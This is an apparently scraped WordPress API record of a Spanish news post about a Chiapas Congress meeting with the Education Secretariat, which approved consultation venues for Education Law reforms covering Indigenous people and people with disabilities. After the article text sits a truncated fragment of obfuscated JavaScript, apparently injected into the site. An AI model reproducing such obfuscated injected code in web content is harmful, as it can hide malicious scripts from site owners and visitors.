{"id":7099,"date":"2022-12-01T03:21:00","date_gmt":"2022-12-01T03:21:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7099"},"modified":"2022-12-01T03:21:01","modified_gmt":"2022-12-01T03:21:01","slug":"en-reunion-interinstitucional-aprueban-sedes-para-consulta-en-materia-educativa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7099","title":{"rendered":"En reuni\u00f3n interinstitucional, aprueban sedes para consulta en materia educativa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"450\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221130-WA0020.jpg\" alt=\"\" class=\"wp-image-7100\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221130-WA0020.jpg 1000w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221130-WA0020-300x135.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221130-WA0020-768x346.jpg 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas; 30 de noviembre de 2022.- Para cumplir con el mandato de la Suprema Corte de Justicia de la Naci\u00f3n (SCJN), el Congreso de Chiapas, inici\u00f3 acciones con la Secretar\u00eda de Educaci\u00f3n (SE) para modificar los art\u00edculos de la Ley de Educaci\u00f3n para incorporar a personas con discapacidad e ind\u00edgenas.<br>En la reuni\u00f3n, encabezada por la diputada Mar\u00eda Diego Reyes G\u00f3mez, presidenta de la Comisi\u00f3n de Educaci\u00f3n y Cultura, se determin\u00f3 nombrar las sedes para la realizaci\u00f3n de las consultas y al mismo tiempo, presentar los puntos de modificaci\u00f3n a la Ley con la cual, se logra atender el tema de referencia.<br>De tal forma que, el Congreso del Estado en coordinaci\u00f3n con la Secretar\u00eda de Educaci\u00f3n y presidentes Municipales y \/o Representantes, nombraron y aprobaron las sedes para consulta en materia educativa.<br>Al hacer uso de la palabra el director de Asuntos Federalizados, de la Secretar\u00eda de Educaci\u00f3n, C\u00e9sar Rodrigo Pastrana; expuso que en el art\u00edculo 70, en su cap\u00edtulo XIV en materia ind\u00edgena, se garantiza el ejercicio de los derechos educativos, culturales y ling\u00fc\u00edsticos, para con los afromexicanos, migrantes, jornaleros agr\u00edcolas, para con los pueblos ind\u00edgenas.<br>En conjunto con las y los diputados y presidentes municipales y\/ o representantes dependencias, realiz\u00f3 algunas precisiones en torno a los art\u00edculos 71, 72, 73, 74, 77 y 78, donde se\u00f1ala lo relativo al perfil del egresado; as\u00ed tambi\u00e9n donde estipula que el sistema educativo estatal, tendr\u00e1 la finalidad de atender la diversidad cultural, ling\u00fc\u00edstica, convivencia intercultural, derecho a la diversidad, impulsar la educaci\u00f3n; lo referente a las disposiciones legales nacionales e internacionales, la autodeterminaci\u00f3n en los t\u00e9rminos del art\u00edculo segundo de la Constituci\u00f3n federal y la necesidad de fortalecer las escuelas ind\u00edgenas, las integrales y albergues escolares ind\u00edgenas.<br>En dichos art\u00edculos, relativos a las personas con discapacidad, colocan en el centro del aprendizaje de ni\u00f1as, ni\u00f1os y adolescentes, as\u00ed como j\u00f3venes, para garantizar el ejercicio del derecho a la educaci\u00f3n, independientemente de sus capacidades, circunstancias, necesidades, estilos y ritmos de aprendizaje y la educaci\u00f3n inclusiva, que refiere al conjunto de acciones orientadas a identificar, prevenir y reducir barreras que limitan el acceso, permanencia, participaci\u00f3n y aprendizaje de todos, eliminando la discriminaci\u00f3n, exclusi\u00f3n y segregaci\u00f3n.<br>Asistieron la Regidora municipal del Ayuntamiento de Las Margaritas, Sara Morales Garc\u00eda; Regidora de San Crist\u00f3bal de la Casas, Elena Kramsky Espinoza; Cinthia Guadalupe Gonz\u00e1lez L\u00f3pez, Secretaria de Educaci\u00f3n y Cultura del Ayuntamiento de Tapachula, Chiapas,; Juan Carlos Bonifaz Trujillo, representante del Ayuntamiento de Tuxtla Guti\u00e9rrez y Pedro Enrique Morales Garc\u00eda, Secretario Municipal del Ayuntamiento de Palenque.<br>Los diputados integrantes de las Comisiones de Educaci\u00f3n y Cultura, Pueblos y Comunidades Ind\u00edgenas y de Atenci\u00f3n a Grupos Vulnerables, fueron: Leticia Albores Ru\u00edz, Marcelo Toledo Cruz, Elizabeth Escobedo Morales, Cecilia L\u00f3pez S\u00e1nchez, Petrona de la Cruz Cruz, Cuauht\u00e9moc Hern\u00e1ndez G\u00f3mez, Martha Guadalupe Mart\u00ednez Ru\u00edz, Mar\u00eda Luiza L\u00f3pez S\u00e1nchez, Mario Humberto V\u00e1zquez L\u00f3pez; as\u00ed como tambi\u00e9n el diputado Carlos Morelos Rodr\u00edguez, como invitado de las Comisiones Unidas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, Chiapas; 30 de noviembre de 2022.- Para cumplir con el mandato de la Suprema Corte de Justicia de la Naci\u00f3n (SCJN), el Congreso de Chiapas, inici\u00f3 acciones con la Secretar\u00eda de Educaci\u00f3n (SE) para modificar los art\u00edculos de la Ley de Educaci\u00f3n para incorporar a personas con discapacidad e ind\u00edgenas.En la reuni\u00f3n, encabezada &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7100,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-7099","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7099","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7099"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7099\/revisions"}],"predecessor-version":[{"id":7101,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7099\/revisions\/7101"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7100"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7099"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7099"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7099"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}